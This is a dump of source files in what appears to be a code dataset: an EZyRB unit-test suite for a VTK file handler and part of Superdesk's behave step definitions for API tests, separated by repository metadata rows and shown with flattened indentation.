self.__dict__['choice'] = submsg.FindU32(MSG_KEY_PARAMS_CHOICE)
try:
self.__dict__['guid'] = submsg.FindData(MSG_KEY_PARAMS_GUID)
except:
pass
|
unlicense
| 8,606,701,729,567,228,000 | 32.785714 | 90 | 0.686228 | false |
fsalmoir/EZyRB
|
tests/test_vtkhandler.py
|
1
|
5854
|
from unittest import TestCase
import unittest
import ezyrb.vtkhandler as vh
import numpy as np
import filecmp
import os
class TestVtkHandler(TestCase):
def test_vtk_instantiation(self):
vtk_handler = vh.VtkHandler()
def test_vtk_default_infile_member(self):
vtk_handler = vh.VtkHandler()
assert vtk_handler.infile == None
def test_vtk_default_extension_member(self):
vtk_handler = vh.VtkHandler()
assert vtk_handler.extension == '.vtk'
def test_vtk_parse_failing_filename_type(self):
vtk_handler = vh.VtkHandler()
with self.assertRaises(TypeError):
output = vtk_handler.parse(5.2)
def test_vtk_parse_failing_output_name_type(self):
vtk_handler = vh.VtkHandler()
with self.assertRaises(TypeError):
output = vtk_handler.parse('tests/test_datasets/matlab_output_test.mat', 5.2)
def test_vtk_parse_failing_check_extension(self):
vtk_handler = vh.VtkHandler()
with self.assertRaises(ValueError):
output = vtk_handler.parse('tests/test_datasets/matlab_output_test.mat')
def test_vtk_parse_infile(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
assert vtk_handler.infile == 'tests/test_datasets/matlab_field_test_bin.vtk'
def test_vtk_parse_shape(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
assert output.shape == (2500, 1)
def test_vtk_parse_check_data_format_1(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
assert vtk_handler.cell_data == False
def test_vtk_parse_check_data_format_2(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/openfoam_output_test.vtk', 'p')
assert vtk_handler.cell_data == True
def test_vtk_parse_coords_1(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
np.testing.assert_almost_equal(output[33][0], 3.7915385)
def test_vtk_parse_coords_2(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
np.testing.assert_almost_equal(output[0][0], 8.2308226)
def test_vtk_write_failing_filename_type(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
with self.assertRaises(TypeError):
vtk_handler.write(output, 4.)
def test_vtk_write_failing_check_extension(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
with self.assertRaises(ValueError):
vtk_handler.write(output, 'tests/test_datasets/matlab_output_test_out.mat')
def test_vtk_write_failing_infile_instantiation(self):
vtk_handler = vh.VtkHandler()
output = np.zeros((40, 3))
with self.assertRaises(RuntimeError):
vtk_handler.write(output, 'tests/test_datasets/matlab_field_test_out.vtk')
def test_vtk_write_default_output_name(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
outfilename = 'tests/test_datasets/matlab_field_test_out_bin.vtk'
vtk_handler.write(output, outfilename, write_bin=True)
os.remove(outfilename)
def test_vtk_write_comparison_bin_1(self):
import vtk
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
output[0] = [1.1]
output[1] = [1.1]
output[2] = [1.1]
output[11] = [1.1]
output[12] = [1.1]
output[13] = [1.1]
output[30] = [1.1]
output[31] = [1.1]
output[32] = [1.1]
outfilename = 'tests/test_datasets/matlab_field_test_out_bin.vtk'
if vtk.VTK_MAJOR_VERSION <= 5:
outfilename_expected = 'tests/test_datasets/matlab_field_test_out_true_bin_version5.vtk'
else:
outfilename_expected = 'tests/test_datasets/matlab_field_test_out_true_bin_version6.vtk'
vtk_handler.write(output, outfilename, 'Pressure', write_bin=True)
self.assertTrue(filecmp.cmp(outfilename, outfilename_expected))
os.remove(outfilename)
def test_vtk_write_comparison_bin_ascii(self):
import vtk
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/openfoam_output_test.vtk', 'p')
output[0] = [1.1]
output[1] = [1.1]
output[2] = [1.1]
output[11] = [1.1]
output[12] = [1.1]
output[13] = [1.1]
output[30] = [1.1]
output[31] = [1.1]
output[32] = [1.1]
outfilename = 'tests/test_datasets/openfoam_output_test_out.vtk'
if vtk.VTK_MAJOR_VERSION <= 5:
outfilename_expected = 'tests/test_datasets/openfoam_output_test_out_true_version5.vtk'
else:
outfilename_expected = 'tests/test_datasets/openfoam_output_test_out_true_version6.vtk'
vtk_handler.write(output, outfilename, 'p')
self.assertTrue(filecmp.cmp(outfilename, outfilename_expected))
os.remove(outfilename)
def test_vtk_write_comparison_ascii(self):
import vtk
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_ascii.vtk', 'Pressure')
output[0] = [1.1]
output[1] = [1.1]
output[2] = [1.1]
output[11] = [1.1]
output[12] = [1.1]
output[13] = [1.1]
output[30] = [1.1]
output[31] = [1.1]
output[32] = [1.1]
outfilename = 'tests/test_datasets/matlab_field_test_out_ascii.vtk'
if vtk.VTK_MAJOR_VERSION <= 5:
outfilename_expected = 'tests/test_datasets/matlab_field_test_out_true_ascii_version5.vtk'
else:
outfilename_expected = 'tests/test_datasets/matlab_field_test_out_true_ascii_version6.vtk'
vtk_handler.write(output, outfilename, 'Pressure')
self.assertTrue(filecmp.cmp(outfilename, outfilename_expected))
os.remove(outfilename)
|
mit
| 7,400,576,381,474,663,000 | 30.473118 | 93 | 0.709771 | false |
hlmnrmr/superdesk-core
|
superdesk/tests/steps.py
|
1
|
91099
|
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
import os
import time
import shutil
from base64 import b64encode
from datetime import datetime, timedelta
from os.path import basename
from re import findall
from unittest.mock import patch
from urllib.parse import urlparse
import arrow
from behave import given, when, then # @UnresolvedImport
from bson import ObjectId
from eve.io.mongo import MongoJSONEncoder
from eve.methods.common import parse
from eve.utils import ParsedRequest, config
from flask import json
from wooper.assertions import (
assert_in, assert_equal, assertions
)
from wooper.general import (
fail_and_print_body, apply_path, parse_json_response,
WooperAssertionError
)
from wooper.expect import (
expect_status, expect_status_in,
expect_json, expect_json_length,
expect_json_contains, expect_json_not_contains,
expect_headers_contain,
)
import superdesk
from superdesk import tests
from superdesk.io import registered_feeding_services
from superdesk.io.commands.update_ingest import LAST_ITEM_UPDATE
from superdesk import default_user_preferences, get_resource_service, utc, etree
from superdesk.io.feed_parsers import XMLFeedParser, EMailRFC822FeedParser
from superdesk.utc import utcnow, get_expiry_date
from superdesk.tests import get_prefixed_url, set_placeholder
from apps.dictionaries.resource import DICTIONARY_FILE
from superdesk.filemeta import get_filemeta
external_url = 'http://thumbs.dreamstime.com/z/digital-nature-10485007.jpg'
DATETIME_FORMAT = "%Y-%m-%dT%H:%M:%S%z"
ANALYTICS_DATETIME_FORMAT = "%Y-%m-%d %H:00:00"
def test_json(context):
try:
response_data = json.loads(context.response.get_data())
except Exception:
fail_and_print_body(context.response, 'response is not valid json')
context_data = json.loads(apply_placeholders(context, context.text))
assert_equal(json_match(context_data, response_data), True,
msg=str(context_data) + '\n != \n' + str(response_data))
return response_data
def test_json_with_string_field_value(context, field):
try:
response_data = json.loads(context.response.get_data())
except Exception:
fail_and_print_body(context.response, 'response is not valid json')
context_data = json.loads(apply_placeholders(context, context.text))
assert_equal(json_match(context_data[field], response_data[field]), True,
msg=str(context_data) + '\n != \n' + str(response_data))
return response_data
def test_key_is_present(key, context, response):
"""Test if given key is present in response.
In case the context value is empty - "", {}, [] - it checks if it's non empty in response.
If it's set in context to false, it will check that it's falsy/empty in response too.
:param key
:param context
:param response
"""
assert not isinstance(context[key], bool) or not response[key], \
'"%s" should be empty or false, but it was "%s" in (%s)' % (key, response[key], response)
def test_key_is_not_present(key, response):
"""Test if given key is not present in response.
:param key
:param response
"""
assert key not in response, \
'"%s" should not be present, but it was "%s" in (%s)' % (key, response[key], response)
def assert_is_now(val, key):
"""Assert that given datetime value is now (with 2s tolerance).
:param val: datetime
:param key: val label - used for error reporting
"""
now = arrow.get()
val = arrow.get(val)
assert val + timedelta(seconds=2) > now, '%s should be now, it is %s' % (key, val)
def json_match(context_data, response_data):
if isinstance(context_data, dict):
if (not isinstance(response_data, dict)):
return False
for key in context_data:
if context_data[key] == "__none__":
assert response_data[key] is None
continue
if context_data[key] == "__no_value__":
test_key_is_not_present(key, response_data)
continue
if key not in response_data:
print(key, ' not in ', response_data)
return False
if context_data[key] == "__any_value__":
test_key_is_present(key, context_data, response_data)
continue
if context_data[key] == "__now__":
assert_is_now(response_data[key], key)
continue
if context_data[key] == "__empty__":
assert len(response_data[key]) == 0, '%s is not empty' % key
continue
if not json_match(context_data[key], response_data[key]):
return False
return True
elif isinstance(context_data, list):
for item_context in context_data:
found = False
for item_response in response_data:
if json_match(item_context, item_response):
found = True
break
if not found:
print(item_context, ' not in ', json.dumps(response_data, indent=2))
return False
return True
elif not isinstance(context_data, dict):
if context_data != response_data:
print('---' + str(context_data) + '---\n', ' != \n', '---' + str(response_data) + '---\n')
return context_data == response_data
def get_fixture_path(context, fixture):
path = context.app.settings['BEHAVE_TESTS_FIXTURES_PATH']
return os.path.join(path, fixture)
def get_macro_path(macro):
abspath = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
return os.path.join(abspath, 'macros', macro)
def get_self_href(resource, context):
assert '_links' in resource, 'expted "_links", but got only %s' % (resource)
return resource['_links']['self']['href']
def get_res(url, context):
response = context.client.get(get_prefixed_url(context.app, url), headers=context.headers)
expect_status(response, 200)
return json.loads(response.get_data())
def parse_date(datestr):
return datetime.strptime(datestr, DATETIME_FORMAT)
def format_date(date_to_format):
return date_to_format.strftime(DATETIME_FORMAT)
def format_date_analytics(date_to_format):
return date_to_format.strftime(ANALYTICS_DATETIME_FORMAT)
def assert_200(response):
"""Assert we get status code 200."""
expect_status_in(response, (200, 201, 204))
def assert_404(response):
"""Assert we get status code 404."""
assert response.status_code == 404, 'Expected 404, got %d' % (response.status_code)
def assert_ok(response):
"""Assert we get ok status within api response."""
expect_status_in(response, (200, 201))
expect_json_contains(response, {'_status': 'OK'})
def get_json_data(response):
return json.loads(response.get_data())
def get_it(context):
it = context.data[0]
res = get_res('/%s/%s' % (context.resource, it['_id']), context)
return get_self_href(res, context), res.get('_etag')
def if_match(context, etag):
headers = []
if etag:
headers = [('If-Match', etag)]
headers = unique_headers(headers, context.headers)
return headers
def unique_headers(headers_to_add, old_headers):
headers = dict(old_headers)
for item in headers_to_add:
headers.update({item[0]: item[1]})
unique_headers = [(k, v) for k, v in headers.items()]
return unique_headers
def patch_current_user(context, data):
response = context.client.get(get_prefixed_url(context.app, '/users/%s' % context.user['_id']),
headers=context.headers)
user = json.loads(response.get_data())
headers = if_match(context, user.get('_etag'))
response = context.client.patch(get_prefixed_url(context.app, '/users/%s' % context.user['_id']),
data=data, headers=headers)
assert_ok(response)
return response
def apply_placeholders(context, text):
placeholders = getattr(context, 'placeholders', {})
for placeholder in findall('#([^#"]+)#', text):
if placeholder.startswith('DATE'):
value = utcnow()
unit = placeholder.find('+')
if unit != -1:
value += timedelta(days=int(placeholder[unit + 1]))
else:
unit = placeholder.find('-')
if unit != -1:
value -= timedelta(days=int(placeholder[unit + 1]))
if placeholder == 'ANALYTICS_DATE_FORMATTED':
value = format_date_analytics(value)
else:
value = format_date(value)
placeholders['LAST_DATE_VALUE'] = value
elif placeholder not in placeholders:
try:
resource_name, field_name = placeholder.split('.', maxsplit=1)
except Exception:
continue
resource = getattr(context, resource_name, None)
for name in field_name.split('.'):
if not resource:
break
resource = resource.get(name, None)
if not resource:
continue
if isinstance(resource, datetime):
value = format_date(resource)
else:
value = str(resource)
else:
value = placeholders[placeholder]
text = text.replace('#%s#' % placeholder, value)
return text
def get_resource_name(url):
parsed_url = urlparse(url)
return basename(parsed_url.path)
def format_items(items):
output = [''] # insert empty line
for item in items:
if item.get('formatted_item'):
item['formatted_item'] = json.loads(item['formatted_item'])
output.append(json.dumps(item, indent=4, sort_keys=True))
return ',\n'.join(output)
@given('empty "{resource}"')
def step_impl_given_empty(context, resource):
if not is_user_resource(resource):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
get_resource_service(resource).delete_action()
@given('"{resource}"')
def step_impl_given_(context, resource):
data = apply_placeholders(context, context.text)
with context.app.test_request_context(context.app.config['URL_PREFIX']):
if not is_user_resource(resource):
get_resource_service(resource).delete_action()
items = [parse(item, resource) for item in json.loads(data)]
if is_user_resource(resource):
for item in items:
item.setdefault('needs_activation', False)
get_resource_service(resource).post(items)
context.data = items
context.resource = resource
try:
setattr(context, resource, items[-1])
except KeyError:
pass
@given('"{resource}" with objectid')
def step_impl_given_with_objectid(context, resource):
data = apply_placeholders(context, context.text)
with context.app.test_request_context(context.app.config['URL_PREFIX']):
items = [parse(item, resource) for item in json.loads(data)]
for item in items:
if '_id' in item:
item['_id'] = ObjectId(item['_id'])
get_resource_service(resource).post(items)
context.data = items
context.resource = resource
setattr(context, resource, items[-1])
@given('the "{resource}"')
def step_impl_given_the(context, resource):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
if not is_user_resource(resource):
get_resource_service(resource).delete_action()
orig_items = {}
items = [parse(item, resource) for item in json.loads(context.text)]
get_resource_service(resource).post(items)
context.data = orig_items or items
context.resource = resource
@given('ingest from "{provider}"')
def step_impl_given_resource_with_provider(context, provider):
resource = 'ingest'
with context.app.test_request_context(context.app.config['URL_PREFIX']):
get_resource_service(resource).delete_action()
items = [parse(item, resource) for item in json.loads(context.text)]
ingest_provider = get_resource_service('ingest_providers').find_one(req=None,
_id=context.providers[provider])
for item in items:
item['ingest_provider'] = context.providers[provider]
item['source'] = ingest_provider.get('source')
get_resource_service(resource).post(items)
context.data = items
context.resource = resource
@given('config update')
def given_config_update(context):
diff = json.loads(context.text)
context.app.config.update(diff)
if 'AMAZON_CONTAINER_NAME' in diff:
from superdesk.storage import AmazonMediaStorage
context.app.media = AmazonMediaStorage(context.app)
m = patch.object(context.app.media, 'client')
m.start()
@given('config')
def step_impl_given_config(context):
tests.setup(context, json.loads(context.text))
tests.setup_auth_user(context)
@given('we have "{role_name}" role')
def step_impl_given_role(context, role_name):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
role = get_resource_service('roles').find_one(name=role_name, req=None)
data = MongoJSONEncoder().encode({'role': role.get('_id')})
response = patch_current_user(context, data)
assert_ok(response)
@given('we have "{user_type}" as type of user')
def step_impl_given_user_type(context, user_type):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
data = json.dumps({'user_type': user_type})
response = patch_current_user(context, data)
assert_ok(response)
@when('we post to auth_db')
def step_impl_when_auth(context):
data = context.text
context.response = context.client.post(
get_prefixed_url(context.app, '/auth_db'), data=data, headers=context.headers)
if context.response.status_code == 200 or context.response.status_code == 201:
item = json.loads(context.response.get_data())
if item.get('_id'):
set_placeholder(context, 'AUTH_ID', item['_id'])
context.headers.append(('Authorization', b'basic ' + b64encode(item['token'].encode('ascii') + b':')))
context.user = item['user']
@when('we sleep for {limit}s')
def when_we_sleep_for(context, limit):
time.sleep(int(limit))
@given('we create a new macro "{macro_name}"')
def step_create_new_macro(context, macro_name):
src = get_fixture_path(context, macro_name)
dst = get_macro_path(macro_name)
shutil.copyfile(src, dst)
@when('we fetch from "{provider_name}" ingest "{guid}"')
def step_impl_fetch_from_provider_ingest(context, provider_name, guid):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
fetch_from_provider(context, provider_name, guid)
def embed_routing_scheme_rules(scheme):
"""Fetch all content filters referenced by the given routing scheme and embed those into scheme.
:param dict scheme: routing scheme configuration
"""
filters_service = superdesk.get_resource_service('content_filters')
rules_filters = (
(rule, str(rule['filter']))
for rule in scheme['rules'] if rule.get('filter'))
for rule, filter_id in rules_filters:
content_filter = filters_service.find_one(_id=filter_id, req=None)
rule['filter'] = content_filter
@when('we fetch from "{provider_name}" ingest "{guid}" using routing_scheme')
def step_impl_fetch_from_provider_ingest_using_routing(context, provider_name, guid):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
_id = apply_placeholders(context, context.text)
routing_scheme = get_resource_service('routing_schemes').find_one(_id=_id, req=None)
embed_routing_scheme_rules(routing_scheme)
fetch_from_provider(context, provider_name, guid, routing_scheme)
@when('we ingest and fetch "{provider_name}" "{guid}" to desk "{desk}" stage "{stage}" using routing_scheme')
def step_impl_fetch_from_provider_ingest_using_routing_with_desk(context, provider_name, guid, desk, stage):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
_id = apply_placeholders(context, context.text)
desk_id = apply_placeholders(context, desk)
stage_id = apply_placeholders(context, stage)
routing_scheme = get_resource_service('routing_schemes').find_one(_id=_id, req=None)
embed_routing_scheme_rules(routing_scheme)
fetch_from_provider(context, provider_name, guid, routing_scheme, desk_id, stage_id)
@when('we ingest with routing scheme "{provider_name}" "{guid}"')
def step_impl_ingest_with_routing_scheme(context, provider_name, guid):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
_id = apply_placeholders(context, context.text)
routing_scheme = get_resource_service('routing_schemes').find_one(_id=_id, req=None)
embed_routing_scheme_rules(routing_scheme)
fetch_from_provider(context, provider_name, guid, routing_scheme)
def fetch_from_provider(context, provider_name, guid, routing_scheme=None, desk_id=None, stage_id=None):
ingest_provider_service = get_resource_service('ingest_providers')
provider = ingest_provider_service.find_one(name=provider_name, req=None)
provider['routing_scheme'] = routing_scheme
if 'rule_set' in provider:
rule_set = get_resource_service('rule_sets').find_one(_id=provider['rule_set'], req=None)
else:
rule_set = None
provider_service = registered_feeding_services[provider['feeding_service']]
provider_service = provider_service.__class__()
if provider.get('name', '').lower() in ('aap', 'dpa', 'ninjs', 'email'):
file_path = os.path.join(provider.get('config', {}).get('path', ''), guid)
feeding_parser = provider_service.get_feed_parser(provider)
if isinstance(feeding_parser, XMLFeedParser):
with open(file_path, 'rb') as f:
xml_string = etree.etree.fromstring(f.read())
items = [feeding_parser.parse(xml_string, provider)]
elif isinstance(feeding_parser, EMailRFC822FeedParser):
with open(file_path, 'rb') as f:
data = f.read()
items = feeding_parser.parse([(1, data)], provider)
else:
parsed = feeding_parser.parse(file_path, provider)
items = [parsed] if not isinstance(parsed, list) else parsed
else:
provider_service.provider = provider
provider_service.URL = provider.get('config', {}).get('url')
items = provider_service.fetch_ingest(guid)
for item in items:
item['versioncreated'] = utcnow()
item['expiry'] = utcnow() + timedelta(minutes=20)
if desk_id:
from bson.objectid import ObjectId
item['task'] = {'desk': ObjectId(desk_id), 'stage': ObjectId(stage_id)}
failed = context.ingest_items(items, provider, provider_service, rule_set=rule_set,
routing_scheme=provider.get('routing_scheme'))
assert len(failed) == 0, failed
provider = ingest_provider_service.find_one(name=provider_name, req=None)
ingest_provider_service.system_update(provider['_id'], {LAST_ITEM_UPDATE: utcnow()}, provider)
for item in items:
set_placeholder(context, '{}.{}'.format(provider_name, item['guid']), item['_id'])
@when('we post to "{url}"')
def step_impl_when_post_url(context, url):
post_data(context, url)
@when('we post to "{url}" with delay')
def step_impl_when_post_url_delay(context, url):
time.sleep(1)
post_data(context, url)
def set_user_default(url, data):
if is_user_resource(url):
user = json.loads(data)
user.setdefault('needs_activation', False)
data = json.dumps(user)
def get_response_etag(response):
return json.loads(response.get_data())['_etag']
@when('we save etag')
def step_when_we_save_etag(context):
context.etag = get_response_etag(context.response)
@then('we get same etag')
def step_then_we_get_same_etag(context):
assert context.etag == get_response_etag(context.response), 'etags not matching'
def store_placeholder(context, url):
if context.response.status_code in (200, 201):
item = json.loads(context.response.get_data())
if item['_status'] == 'OK' and item.get('_id'):
try:
setattr(context, get_resource_name(url), item)
except (IndexError, KeyError):
pass
def post_data(context, url, success=False):
with context.app.mail.record_messages() as outbox:
data = apply_placeholders(context, context.text)
url = apply_placeholders(context, url)
set_user_default(url, data)
context.response = context.client.post(get_prefixed_url(context.app, url),
data=data, headers=context.headers)
if success:
assert_ok(context.response)
item = json.loads(context.response.get_data())
context.outbox = outbox
store_placeholder(context, url)
return item
@when('we post to "{url}" with "{tag}" and success')
def step_impl_when_post_url_with_tag(context, url, tag):
item = post_data(context, url, True)
if item.get('_id'):
set_placeholder(context, tag, item.get('_id'))
@given('we have "{url}" with "{tag}" and success')
def step_impl_given_post_url_with_tag(context, url, tag):
item = post_data(context, url, True)
if item.get('_id'):
set_placeholder(context, tag, item.get('_id'))
@when('we post to "{url}" with success')
def step_impl_when_post_url_with_success(context, url):
post_data(context, url, True)
@when('we put to "{url}"')
def step_impl_when_put_url(context, url):
with context.app.mail.record_messages() as outbox:
data = apply_placeholders(context, context.text)
href = get_self_href(url)
context.response = context.client.put(get_prefixed_url(context.app, href), data=data, headers=context.headers)
assert_ok(context.response)
context.outbox = outbox
@when('we get "{url}"')
def when_we_get_url(context, url):
url = apply_placeholders(context, url).encode('ascii').decode('unicode-escape')
headers = []
if context.text:
for line in context.text.split('\n'):
key, val = line.split(': ')
headers.append((key, val))
headers = unique_headers(headers, context.headers)
url = apply_placeholders(context, url)
context.response = context.client.get(get_prefixed_url(context.app, url), headers=headers)
@when('we get dictionary "{dictionary_id}"')
def when_we_get_dictionary(context, dictionary_id):
dictionary_id = apply_placeholders(context, dictionary_id)
url = '/dictionaries/' + dictionary_id + '?projection={"content": 1}'
return when_we_get_url(context, url)
@then('we get latest')
def step_impl_we_get_latest(context):
data = get_json_data(context.response)
href = get_self_href(data, context)
headers = if_match(context, data.get('_etag'))
href = get_prefixed_url(context.app, href)
context.response = context.client.get(href, headers=headers)
assert_200(context.response)
@when('we find for "{resource}" the id as "{name}" by "{search_criteria}"')
def when_we_find_for_resource_the_id_as_name_by_search_criteria(context, resource, name, search_criteria):
url = '/' + resource + '?' + search_criteria
context.response = context.client.get(get_prefixed_url(context.app, url), headers=context.headers)
if context.response.status_code == 200:
expect_json_length(context.response, 1, path='_items')
item = json.loads(context.response.get_data())
item = item['_items'][0]
if item.get('_id'):
set_placeholder(context, name, item['_id'])
@when('we delete "{url}"')
def step_impl_when_delete_url(context, url):
with context.app.mail.record_messages() as outbox:
url = apply_placeholders(context, url)
res = get_res(url, context)
href = get_self_href(res, context)
headers = if_match(context, res.get('_etag'))
href = get_prefixed_url(context.app, href)
context.response = context.client.delete(href, headers=headers)
context.outbox = outbox
@when('we delete link "{url}"')
def step_impl_when_delete_link_url(context, url):
with context.app.mail.record_messages() as outbox:
url = apply_placeholders(context, url)
headers = context.headers
context.response = context.client.delete(get_prefixed_url(context.app, url), headers=headers)
context.outbox = outbox
@when('we delete all sessions "{url}"')
def step_impl_when_delete_all_url(context, url):
with context.app.mail.record_messages() as outbox:
url = apply_placeholders(context, url)
headers = context.headers
href = get_prefixed_url(context.app, url)
context.response = context.client.delete(href, headers=headers)
context.outbox = outbox
@when('we delete latest')
def when_we_delete_it(context):
with context.app.mail.record_messages() as outbox:
res = get_json_data(context.response)
href = get_self_href(res, context)
headers = if_match(context, res.get('_etag'))
href = get_prefixed_url(context.app, href)
context.response = context.client.delete(href, headers=headers)
context.email = outbox
@when('we patch "{url}"')
def step_impl_when_patch_url(context, url):
with context.app.mail.record_messages() as outbox:
url = apply_placeholders(context, url)
res = get_res(url, context)
href = get_self_href(res, context)
headers = if_match(context, res.get('_etag'))
data = apply_placeholders(context, context.text)
href = get_prefixed_url(context.app, href)
context.response = context.client.patch(href, data=data, headers=headers)
context.outbox = outbox
@when('we patch latest')
def step_impl_when_patch_again(context):
with context.app.mail.record_messages() as outbox:
data = get_json_data(context.response)
href = get_prefixed_url(context.app, get_self_href(data, context))
headers = if_match(context, data.get('_etag'))
data2 = apply_placeholders(context, context.text)
context.response = context.client.patch(href, data=data2, headers=headers)
if context.response.status_code in (200, 201):
item = json.loads(context.response.get_data())
if item['_status'] == 'OK' and item.get('_id'):
setattr(context, get_resource_name(href), item)
assert_ok(context.response)
context.outbox = outbox
@when('we patch latest without assert')
def step_impl_when_patch_without_assert(context):
data = get_json_data(context.response)
href = get_prefixed_url(context.app, get_self_href(data, context))
headers = if_match(context, data.get('_etag'))
data2 = apply_placeholders(context, context.text)
context.response = context.client.patch(href, data=data2, headers=headers)
@when('we patch routing scheme "{url}"')
def step_impl_when_patch_routing_scheme(context, url):
with context.app.mail.record_messages() as outbox:
url = apply_placeholders(context, url)
res = get_res(url, context)
href = get_self_href(res, context)
headers = if_match(context, res.get('_etag'))
data = json.loads(apply_placeholders(context, context.text))
res.get('rules', []).append(data)
context.response = context.client.patch(get_prefixed_url(context.app, href),
data=json.dumps({'rules': res.get('rules', [])}),
headers=headers)
context.outbox = outbox
@when('we patch given')
def step_impl_when_patch(context):
with context.app.mail.record_messages() as outbox:
href, etag = get_it(context)
headers = if_match(context, etag)
context.response = context.client.patch(get_prefixed_url(context.app, href), data=context.text, headers=headers)
assert_ok(context.response)
context.outbox = outbox
@when('we get given')
def step_impl_when_get(context):
href, _etag = get_it(context)
context.response = context.client.get(get_prefixed_url(context.app, href), headers=context.headers)
@when('we restore version {version}')
def step_impl_when_restore_version(context, version):
data = get_json_data(context.response)
href = get_self_href(data, context)
headers = if_match(context, data.get('_etag'))
text = '{"type": "text", "old_version": %s, "last_version": %s}' % (version, data.get('_current_version'))
context.response = context.client.put(get_prefixed_url(context.app, href), data=text, headers=headers)
assert_ok(context.response)
@when('we upload a file "{filename}" to "{dest}"')
def step_impl_when_upload_image(context, filename, dest):
upload_file(context, dest, filename, 'media')
@when('we upload a binary file with cropping')
def step_impl_when_upload_with_crop(context):
data = {'CropTop': '0', 'CropLeft': '0', 'CropBottom': '333', 'CropRight': '333'}
upload_file(context, '/upload', 'bike.jpg', 'media', data)
@when('upload a file "{file_name}" to "{destination}" with "{guid}"')
def step_impl_when_upload_image_with_guid(context, file_name, destination, guid):
upload_file(context, destination, file_name, 'media', {'guid': guid})
if destination == 'archive':
set_placeholder(context, 'original.href', context.archive['renditions']['original']['href'])
set_placeholder(context, 'original.media', context.archive['renditions']['original']['media'])
@when('we upload a new dictionary with success')
def when_upload_dictionary(context):
data = json.loads(apply_placeholders(context, context.text))
upload_file(context, '/dictionaries', 'test_dict.txt', DICTIONARY_FILE, data)
assert_ok(context.response)
@when('we upload to an existing dictionary with success')
def when_upload_patch_dictionary(context):
data = json.loads(apply_placeholders(context, context.text))
url = apply_placeholders(context, '/dictionaries/#dictionaries._id#')
etag = apply_placeholders(context, '#dictionaries._etag#')
upload_file(context, url, 'test_dict2.txt', DICTIONARY_FILE, data, 'patch', [('If-Match', etag)])
assert_ok(context.response)
def upload_file(context, dest, filename, file_field, extra_data=None, method='post', user_headers=[]):
with open(get_fixture_path(context, filename), 'rb') as f:
data = {file_field: f}
if extra_data:
data.update(extra_data)
headers = [('Content-Type', 'multipart/form-data')]
headers.extend(user_headers)
headers = unique_headers(headers, context.headers)
url = get_prefixed_url(context.app, dest)
context.response = getattr(context.client, method)(url, data=data, headers=headers)
assert_ok(context.response)
store_placeholder(context, url)
@when('we upload a file from URL')
def step_impl_when_upload_from_url(context):
data = {'URL': external_url}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
context.response = context.client.post(get_prefixed_url(context.app, '/upload'), data=data, headers=headers)
@when('we upload a file from URL with cropping')
def step_impl_when_upload_from_url_with_crop(context):
data = {'URL': external_url,
'CropTop': '0',
'CropLeft': '0',
'CropBottom': '333',
'CropRight': '333'}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
context.response = context.client.post(get_prefixed_url(context.app, '/upload'), data=data, headers=headers)
@when('we get user profile')
def step_impl_when_get_user(context):
profile_url = '/%s/%s' % ('users', context.user['_id'])
context.response = context.client.get(get_prefixed_url(context.app, profile_url), headers=context.headers)
@then('we get new resource')
def step_impl_then_get_new(context):
assert_ok(context.response)
expect_json_contains(context.response, 'self', path='_links')
if context.text is not None:
return test_json(context)
@then('we get error {code}')
def step_impl_then_get_error(context, code):
expect_status(context.response, int(code))
if context.text:
test_json(context)
@then('we get list with {total_count} items')
def step_impl_then_get_list(context, total_count):
assert_200(context.response)
data = get_json_data(context.response)
int_count = int(total_count.replace('+', '').replace('<', ''))
if '+' in total_count:
assert int_count <= data['_meta']['total'], '%d items is not enough' % data['_meta']['total']
elif total_count.startswith('<'):
assert int_count > data['_meta']['total'], '%d items is too much' % data['_meta']['total']
else:
assert int_count == data['_meta']['total'], 'got %d: %s' % (data['_meta']['total'],
format_items(data['_items']))
if context.text:
test_json(context)
@then('we get list ordered by {field} with {total_count} items')
def step_impl_ordered_list(context, field, total_count):
step_impl_then_get_list(context, total_count)
data = get_json_data(context.response)
fields = []
for i in data['_items']:
fields.append(i[field])
assert sorted(fields) == fields
@then('we get "{value}" in formatted output')
def step_impl_then_get_formatted_output(context, value):
assert_200(context.response)
value = apply_placeholders(context, value)
data = get_json_data(context.response)
for item in data['_items']:
if value in item['formatted_item']:
return
assert False
@then('we get "{value}" in formatted output as "{group}" story for subscriber "{sub}"')
def step_impl_then_get_formatted_output_as_story(context, value, group, sub):
assert_200(context.response)
value = apply_placeholders(context, value)
data = get_json_data(context.response)
for item in data['_items']:
if item['subscriber_id'] != sub:
continue
try:
